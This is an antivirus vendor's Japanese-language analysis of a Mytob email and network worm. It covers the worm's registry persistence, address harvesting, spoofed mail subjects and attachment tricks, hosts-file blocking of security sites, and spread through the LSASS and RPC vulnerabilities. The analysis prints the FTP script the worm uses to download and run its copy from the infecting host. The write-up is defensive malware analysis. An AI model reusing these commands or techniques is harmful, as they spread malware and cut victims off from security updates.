注意：
以下の説明文では、Windowsオペレーティングシステムがインストールされたディレクトリを%windir% と表記しており、インストール時の設定により異なる場合があります。%windir% のサブディレクトリである"System"や"System32"は %system% と表記しています。

このワームが実行されると、このワームは自分自身のコピーを%system%フォルダに
"win32.exe"というファイル名で作成します。そして、"HELLMSN.EXE"という6,050バイトのコンポーネントをルートディレクトリに作成します。

このコンポーネントは、FSGによって圧縮されており、NOD32では"W32/Mytob.I"として検出します。

このワームは、ルートディレクトリに自分自身のコピーを、次のファイル名で作成します。

"funny_pic.scr"
"my_photo2005.scr"
"see_this!!.scr"

このワームは、自分自身の唯一のコピーだけが感染したコンピュータ上で実行されるようにします。（Mutexという仕組みで、自分自身が二重起動されないようにします。）

このワームは、作成したファイルがWindowsの再起動時に実行されるように、次のレジストリキーを追加します。

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WIN32" = "win32.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WIN32" = "win32.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WIN32" = "win32.exe"

また、次のレジストリーキーを追加します。

HKLM\Software\Microsoft\OLE
"WIN32" = "win32.exe"

HKCU\Software\Microsoft\OLE
"WIN32" = "win32.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WIN32" = "win32.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WIN32" = "win32.exe"

このワームは、これらのレジストリキーを監視して、存在しない場合は再作成します。

このワームは、感染したコンピュータのローカルドライブを検索し、次の拡張子を持つファイルから、メールアドレスを取得します。

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

ただし、実際のワームの動作は、上記の拡張子のリストのうち、少なくとも1つの文字が含まれているファイルを発見した場合、そのファイル内部を検索し、メールアドレスを収集します。例えば、拡張子に htm、ht、h を含むファイル内部を検索します。

さらに、Windowsのアドレス帳と次のフォルダから、メールアドレスを収集します。

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

このワームは、自分自身の送信先のドメインに対して、適切なメールサーバを検出する為に、DNSに解決を要求します。このDNS要求が失敗した場合、送信先のメールサーバを推測する為に、ドメイン名の前に次の接頭語を付加して、送信先を決めています。

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

このワームは、収集したアドレスに次のいずれかの名前をランダムに付加して、
メールアドレスを作成します。

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney,
bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james,
jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita,
madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra,
serg, smith, stan, steve, ted, tom

そして、次のドメイン名をランダムに付加します。

aol.com
cia.gov
fbi.gov
hotmail.com
juno.com
msn.com
yahoo.com

メールの送信には、独自のSMTPエンジンを使用します。

このワームが送信するメールの題名は、次のいずれかがランダムに選択されます。

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

このワームが送信するメールの本文には、次のいずれかのテキストが含まれます。
本文は、空白の場合や、無作為な文字列を含む場合もあります。

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

このワームは、自分自身のコピーに、次のいずれかのファイル名を付けます。

body
message
test
data
file
text
doc
readme
document

このファイルの拡張子は、次のいずれかです。

bat
cmd
exe
scr
pif
zip

また、自分自身をZIP形式で添付する場合があります。圧縮されたファイルの拡張子は二重拡張子になっており、第一拡張子は次のいずれかです。

htm
txt
doc

第二拡張子は次のいずれかであり、第一拡張子は多数のスペースで隔たれています。

pif
scr
exe

例えば、"text.zip" は、"text.txt[多数のスペース].src" というファイルを含みます。

注意：
このように多数のスペースを含むファイル名をもつファイルが、ZIPで圧縮されている場合、メールソフトや解凍ツールでは一見すると、 "text.txt"が圧縮されているように見えることがあるので、そのまま解凍して実行することは危険です。必ず解凍後のファイルの拡張子も確認し、不用意に実行しないようにしなければなりません。

このワームは、以下の文字列を含むメールアドレスには、送信しません。

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:,
berkeley, borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido,
foo., fsf., gnu, gold-certs, google, gov., help, hotmail, iana, ibm.com, icrosof,
icrosoft, ietf, info, inpris, isc.o, isi.e, kernel, linux, listserv, math, mit.e,
mozilla, msn., mydomai, nobody, nodomai, noone, not, nothing, ntivi, page, panda,
pgp, postmaster, privacy, rating, rfc-ed, ripe., root, ruslis, samples, secur,
sendmail, service, site, soft, somebody, someone, sopho, spm, submit, support,
syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster, www, you, your, -._!, -._!@

このワームは、これらのサイト(セキュリティ関連のWebサイト)にアクセスするのを避ける為、次のデータで現在のホストファイルを上書きします。

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.trendmicro.com

このワームは、MS04-011(LSASSバッファオーバーフローの脆弱性)を利用して、ランダムに生成されたIPアドレスの445番ポートへ接続を試みます。

また、MS03-026(RPCバッファオーバーランの脆弱性)も利用します。

※各脆弱性に関するマイクロソフト社の説明は、こちらをご参照ください。

MS03-026
http://www.microsoft.com/japan/technet/security/bulletin/MS03-026.mspx

MS04-011
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx

この脆弱性を利用して、進入に成功した場合、"D12.txt"という次のFTPコマンドが
書かれたファイルをダウンロードします。

open %IP% %TCP port%
user hell rulez
binary
get win16.exe
quit

感染したコンピュータ内で、FTP.EXEが実行されると、ワームのコピーである"win16.exe"がダウンロードされ、このファイルを実行します。

このワームは、MSNメッセンジャーを利用して、自分自身のコピーを送信することができます。

NOD32アンチウイルスは、ウイルス定義ファイルのバージョン 1.1055 にて対応しています。